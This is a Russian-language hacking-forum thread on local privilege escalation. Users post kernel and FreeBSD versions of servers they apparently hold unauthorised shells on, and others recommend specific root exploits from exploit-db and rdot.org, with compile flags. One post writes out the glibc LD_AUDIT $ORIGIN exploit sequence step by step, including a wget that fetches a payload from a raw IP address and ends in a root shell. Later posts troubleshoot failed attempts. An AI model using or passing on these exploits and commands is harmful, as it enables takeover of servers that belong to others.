повышение прав [задай вопрос - получи ответ]

эти все пробовал нее

Expl0ited

эти тоже
а этот Ac1db1tch3z vs x86_64 Linux Kernel
вообще скомпилен не правильно под это ядро
надо так
gcc Ac1db1tch3z.c -m32 -o Ac1db1tch3z

 

попробуй этот пост: #499

У тебя ноябрь, а роберт ю сак сентябрьский, так что даже и не знаю, что тебе посоветовать.

 

есть сервер FreeBSD 7.3, но gcc нет - сплойт не запустить? А если скомпилированный бинарник запустить, то будет работать?

 

Тут же установлен grsec, т.ч. про айсидбитчез и возможно другие сплоеты забудь.
Скинь ls -la /lib/libc*; ls -la /lib/libpc*
Возможно Glibc возьмет (сам не проверял возможность эксплуатации Glibc с установленным grsec, но вроде на эксплуатацию уязвимости с Glibc он повлиять не должен, но повторюсь, я не уверен в этом).

А вот под это попробуй:
http://www.exploit-db.com/exploits/15704/
http://www.exploit-db.com/exploits/15944/
http://www.exploit-db.com/exploits/15916/

Два последних сплоита я сам не тестил, ну и конечно же проверь можно ли взять Glibc'ом.

Ты троллишь чтоле? =)
gcc только для компиляции, смело запускай из директории которая не под noexec
Кстати под FreeBSD 7.3 советую вот это:
https://rdot.org/forum/showthread.php?t=601
Проверенный сплоит ) Ну это смотря какого года у тебя сборка...

 

Я имею ввиду, что если gcc нет на сервере, то не скомпилировать сплойт.
За сплойт спасибо. Сборка 2010 года.
У кого-нибудь есть уже скомпилированный бинарник или скомпилируйте, пожалуйста, этот сплойт https://rdot.org/forum/showthread.php?t=601

P.S. Сплойты под фряху на лине можно компилить?

 

Linux icpu1521 2.6.28.8-20101130b
-rwxr-xr-x 1 root root 1147548 Jan 21 2010 /lib/libc-2.3.6.so
lrwxrwxrwx 1 root root 13 Sep 15 2010 /lib/libc.so.6 -> libc-2.3.6.so
lrwxrwxrwx 1 root root 14 Sep 15 2010 /lib/libcap.so.1 -> libcap.so.1.10
-rw-r--r-- 1 root root 11024 Apr 14 2004 /lib/libcap.so.1.10
lrwxrwxrwx 1 root root 17 Sep 15 2010 /lib/libcfont.so.0 -> libcfont.so.0.0.0
-rw-r--r-- 1 root root 10644 Sep 5 2006 /lib/libcfont.so.0.0.0
-rw-r--r-- 1 root root 181684 Jan 21 2010 /lib/libcidn-2.3.6.so
lrwxrwxrwx 1 root root 16 Sep 15 2010 /lib/libcidn.so.1 -> libcidn-2.3.6.so
lrwxrwxrwx 1 root root 17 Sep 15 2010 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rw-r--r-- 1 root root 5820 Dec 6 2007 /lib/libcom_err.so.2.1
lrwxrwxrwx 1 root root 19 Sep 15 2010 /lib/libconsole.so.0 -> libconsole.so.0.0.0
-rw-r--r-- 1 root root 73540 Sep 5 2006 /lib/libconsole.so.0.0.0
-rw-r--r-- 1 root root 21868 Jan 21 2010 /lib/libcrypt-2.3.6.so
lrwxrwxrwx 1 root root 17 Sep 15 2010 /lib/libcrypt.so.1 -> libcrypt-2.3.6.so
lrwxrwxrwx 1 root root 19 Sep 15 2010 /lib/libctutils.so.0 -> libctutils.so.0.0.0
-rw-r--r-- 1 root root 18380 Sep 5 2006 /lib/libctutils.so.0.0.0
-rw-r--r-- 1 root root 5400 Jan 21 2010 /lib/libpcprofile.so

 

Сделай df -h и если дира /tmp не смонтирована в другом разделе, то всё ок можешь приступать к:

Code:

$ mkdir /tmp/exploit
$ ln /bin/ping /tmp/exploit/target
$ exec 3< /tmp/exploit/target
$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target*
$ rm -rf /tmp/exploit/
$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted)
$ wget -O /tmp/payload.c http://194.105.208.43/payload.c
$ gcc -w -fPIC -shared -o /tmp/exploit /tmp/payload.c
$ ls -l /tmp/exploit
-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*
$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
sh-4.1# whoami
root
sh-4.1# id
uid=0(root) gid=500(taviso)

(c) http://www.opennet.ru/opennews/art.shtml?num=28338

Если не выйдет, то что же, заюзай: http://blog.nibbles.fr/2230

 

df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda7 3.7G 1.5G 2.1G 41% /
/dev/sdb 933G 588G 346G 64% /homepages
что это дает

 

Всё нормально, пробуй.

 

в tmp каталог exploit создался но при вводе

ln /bin/ping /tmp/exploit/target

ln: creating hard link `/tmp/exploit/target' to `/bin/ping': Invalid cross-device link

 

Значит ты находишься тут /dev/sdb, а система /dev/sda7
И соответственно ничего не выйдет.

 

((

 

Что я делаю не так (Glibs)
ввожу:
LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
дает ошибку
и моя консоль уходит в даун

 

Linux thrashers 2.6.32.8-grsec-2.1.14-modsign-xeon-64 #2 SMP Sat Mar 13 00:42:43 PST 2010 x86_64
Что под это чудо посоветуете?)

 

Linux 2.6.18-238.19.1.el5.028stab092.2 #1 SMP Thu Jul 21 19:23:22 MSD 2011 i686
FreeBSD 7.3-amd64-20100831 amd64 at
Linux 2.6.35.7-grsecnew #1 SMP Mon Dec 13 08:34:39 CST 2010 x86_64


Хотя бы под одну, есть что нибудь?

 

Под первое и 3-е однозначно ничего нет.

 

нет.

 

FreeBSD 7.3-amd64-20100831 amd64 at
https://rdot.org/forum/showthread.php?t=601

Linux 2.6.35.7-grsecnew #1 SMP Mon Dec 13 08:34:39 CST 2010 x86_64
glibs

 

Скорее всего пропатчен.

 

Создай sh-файл, пихни туда "LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3", выполни sh-файл, тогда консолька не вылетит, но скорее всего это патч.

Мог подойти Ac1dB1tch3z, но врятли возьмет из-за grsec: http://www.exploit-db.com/exploits/15024/
Ну а так дай вывод: ls -la /lib/libc* ; ls -la /lib/libpc* ; df -h

Может быть библиотеки Glibc бажные, покажи вывод команды: ls -la /lib/libc* ; ls -la /lib/libpc* ; df -h

Попробуй это: http://www.exploit-db.com/exploits/15944/, но врятли, ну а так тоже есть шанс взять Glibc'ом...